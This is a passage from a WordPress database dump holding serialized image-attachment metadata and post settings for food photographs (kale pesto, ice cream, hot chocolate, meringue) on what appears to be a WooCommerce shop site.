;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"Long-kale-pesto-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"Long-kale-pesto-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"Long-kale-pesto-1536x680.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:28:\"Long-kale-pesto-2048x907.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:907;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"Long-kale-pesto-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"Long-kale-pesto-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"Long-kale-pesto-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:29:\"Long-kale-pesto-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"Long-kale-pesto-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"Long-kale-pesto-scaled-600x266.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"Long-kale-pesto-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552205477\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11964,4945,'_wp_attached_file','2020/04/Long-breakfast-scaled.jpg'),(11965,4945,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2560;s:6:\"height\";i:872;s:4:\"file\";s:33:\"2020/04/Long-breakfast-scaled.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"Long-breakfast-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"Long-breakfast-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"Long-breakfast-scaled-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Long-breakfast-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Long-breakfast-1024x349.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Long-breakfast-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Long-breakfast-768x262.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"Long-breakfast-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"Long-breakfast-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"Long-breakfast-1536x523.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:523;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:27:\"Long-breakfast-2048x698.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:698;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"Long-breakfast-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"Long-breakfast-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"Long-breakfast-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"Long-breakfast-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"Long-breakfast-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"Long-breakfast-scaled-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"Long-breakfast-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552094044\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11966,4946,'_wp_attached_file','2020/04/icecream-landsc3small.jpg'),(11967,4946,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:970;s:6:\"height\";i:1456;s:4:\"file\";s:33:\"2020/04/icecream-landsc3small.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"icecream-landsc3small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-600x901.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:901;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"icecream-landsc3small-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"icecream-landsc3small-768x1153.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-970x550.jpg\";s:5:\"width\";i:970;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:34:\"icecream-landsc3small-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:34:\"icecream-landsc3small-970x1100.jpg\";s:5:\"width\";i:970;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"icecream-landsc3small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-600x901.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:901;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"icecream-landsc3small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1463066486\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11968,4947,'_wp_attached_file','2020/04/icecream-lolly-small.jpg'),(11969,4947,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1456;s:6:\"height\";i:970;s:4:\"file\";s:32:\"2020/04/icecream-lolly-small.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"icecream-lolly-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"icecream-lolly-small-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"icecream-lolly-small-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-550x970.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:970;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"icecream-lolly-small-1100x970.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:970;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"icecream-lolly-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"icecream-lolly-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1463066486\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11970,2278,'_edit_lock','1586180079:1'),(11971,2278,'_wp_old_slug','h1-parallax-1'),(11972,2278,'portfolio_single_masonry_image_size',''),(11973,2278,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(11974,2278,'_edit_last','1'),(11975,2278,'_wp_page_template','default'),(11976,566,'_wp_old_slug','contact-img-5'),(11977,566,'_edit_lock','1586432564:1'),(11978,566,'portfolio_single_masonry_image_size',''),(11979,566,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(11980,566,'_edit_last','1'),(11981,566,'_wp_page_template','default'),(11982,2769,'_wp_old_slug','h4-logo'),(11983,2769,'_edit_lock','1586181226:1'),(11984,2769,'portfolio_single_masonry_image_size',''),(11985,2769,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(11986,2769,'_edit_last','1'),(11987,2769,'_wp_page_template','default'),(11988,1021,'_wp_old_slug','h1-slide1-background1'),(11989,1021,'_edit_lock','1586181562:1'),(11990,1021,'portfolio_single_masonry_image_size',''),(11991,1021,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(11992,1021,'_edit_last','1'),(11993,1021,'_wp_page_template','default'),(11994,1029,'_edit_lock','1586193445:1'),(11995,1029,'portfolio_single_masonry_image_size',''),(11996,1029,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(11997,1029,'_edit_last','1'),(11998,1029,'_wp_page_template','default'),(11999,1029,'_wp_old_slug','h1-slide3-background'),(12000,4270,'_edit_lock','1586193470:1'),(12001,4234,'_edit_lock','1586193489:1'),(12002,3944,'_wp_old_slug','recipe-img-3'),(12003,3944,'_edit_lock','1586193821:1'),(12004,3944,'portfolio_single_masonry_image_size',''),(12005,3944,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12006,3944,'_edit_last','1'),(12007,3944,'_wp_page_template','default'),(12008,3951,'_edit_lock','1586197005:1'),(12009,3951,'_wp_old_slug','h1-img3'),(12010,3951,'portfolio_single_masonry_image_size',''),(12011,3951,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12012,3951,'_edit_last','1'),(12013,3951,'_wp_page_template','default'),(12014,3952,'_edit_lock','1586197864:1'),(12015,3952,'portfolio_single_masonry_image_size',''),(12016,3952,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12017,3952,'_edit_last','1'),(12018,3952,'_wp_page_template','default'),(12019,3953,'_wp_old_slug','h1-img5'),(12020,3953,'_edit_lock','1586197370:1'),(12021,3953,'portfolio_single_masonry_image_size',''),(12022,3953,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12023,3953,'_edit_last','1'),(12024,3953,'_wp_page_template','default'),(12025,3952,'_wp_old_slug','h1-img4'),(12026,4269,'_edit_lock','1586197892:1'),(12027,3973,'_edit_lock','1586261086:1'),(12028,668,'_edit_lock','1586211355:1'),(12029,4948,'_wp_attached_file','2020/04/dipped_fruit_square_880x.jpg'),(12030,4948,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:36:\"2020/04/dipped_fruit_square_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"dipped_fruit_square_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1511095939\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12031,4949,'_wp_attached_file','2020/04/hot_chocolate_square_880x.jpg'),(12032,4949,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:880;s:4:\"file\";s:37:\"2020/04/hot_chocolate_square_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-550x880.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"hot_chocolate_square_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1432533217\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12033,4950,'_wp_attached_file','2020/04/meringue3_880x.jpg'),(12034,4950,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:571;s:4:\"file\";s:26:\"2020/04/meringue3_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"meringue3_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-600x389.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"meringue3_880x-550x571.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:571;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"meri